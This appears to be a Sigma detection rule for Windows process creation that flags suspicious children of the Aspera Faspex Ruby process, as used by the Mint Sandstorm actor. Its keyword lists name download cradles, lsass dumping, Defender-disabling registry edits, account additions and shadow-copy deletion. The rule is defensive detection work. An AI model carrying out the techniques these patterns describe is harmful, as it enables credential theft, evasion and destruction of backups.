Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
Sigma rule (View on GitHub)
1title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
2id: 91048c0d-5b81-4b85-a099-c9ee4fb87979
3status: test
4description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
5references:
6 - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
7author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
8date: 2023-04-20
9modified: 2023-04-25
10tags:
11 - attack.execution
12 - detection.emerging-threats
13logsource:
14 category: process_creation
15 product: windows
16detection:
17 selection_parent:
18 ParentImage|contains|all:
19 - 'aspera'
20 - '\ruby'
21 selection_special_child_powershell_img:
22 Image|endswith:
23 - '\powershell.exe'
24 - '\powershell_ise.exe'
25 selection_special_child_powershell_cli:
26 - CommandLine|contains:
27 - ' echo '
28 - '-dumpmode'
29 - '-ssh'
30 - '.dmp'
31 - 'add-MpPreference'
32 - 'adscredentials'
33 - 'bitsadmin'
34 - 'certutil'
35 - 'csvhost.exe'
36 - 'DownloadFile'
37 - 'DownloadString'
38 - 'dsquery'
39 - 'ekern.exe'
40 - 'FromBase64String'
41 - 'iex '
42 - 'iex('
43 - 'Invoke-Expression'
44 - 'Invoke-WebRequest'
45 - 'localgroup administrators'
46 - 'net group'
47 - 'net user'
48 - 'o365accountconfiguration'
49 - 'query session'
50 - 'samaccountname='
51 - 'set-MpPreference'
52 - 'svhost.exe'
53 - 'System.IO.Compression'
54 - 'System.IO.MemoryStream'
55 - 'usoprivate'
56 - 'usoshared'
57 - 'whoami'
58 - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
59 selection_special_child_lsass_1:
60 CommandLine|contains: 'lsass'
61 selection_special_child_lsass_2:
62 CommandLine|contains:
63 - 'procdump'
64 - 'tasklist'
65 - 'findstr'
66 selection_child_wget:
67 Image|endswith: '\wget.exe'
68 CommandLine|contains: 'http'
69 selection_child_curl:
70 Image|endswith: '\curl.exe'
71 CommandLine|contains: 'http'
72 selection_child_script:
73 CommandLine|contains:
74 - 'E:jscript'
75 - 'e:vbscript'
76 selection_child_localgroup:
77 CommandLine|contains|all:
78 - 'localgroup Administrators'
79 - '/add'
80 selection_child_net:
81 CommandLine|contains: 'net' # Covers net1
82 CommandLine|contains|all:
83 - 'user'
84 - '/add'
85 selection_child_reg:
86 - CommandLine|contains|all:
87 - 'reg add'
88 - 'DisableAntiSpyware'
89 - '\Microsoft\Windows Defender'
90 - CommandLine|contains|all:
91 - 'reg add'
92 - 'DisableRestrictedAdmin'
93 - 'CurrentControlSet\Control\Lsa'
94 selection_child_wmic_1:
95 CommandLine|contains|all:
96 - 'wmic'
97 - 'process call create'
98 selection_child_wmic_2:
99 CommandLine|contains|all:
100 - 'wmic'
101 - 'delete'
102 - 'shadowcopy'
103 selection_child_vssadmin:
104 CommandLine|contains|all:
105 - 'vssadmin'
106 - 'delete'
107 - 'shadows'
108 selection_child_wbadmin:
109 CommandLine|contains|all:
110 - 'wbadmin'
111 - 'delete'
112 - 'catalog'
113 condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)
114falsepositives:
115 - Unlikely
116level: critical
References
Related rules
- APT29 2018 Phishing Campaign CommandLine Indicators
- Adwind RAT / JRAT
- Blue Mockingbird
- CVE-2021-1675 Print Spooler Exploitation
- CVE-2021-1675 Print Spooler Exploitation IPC Access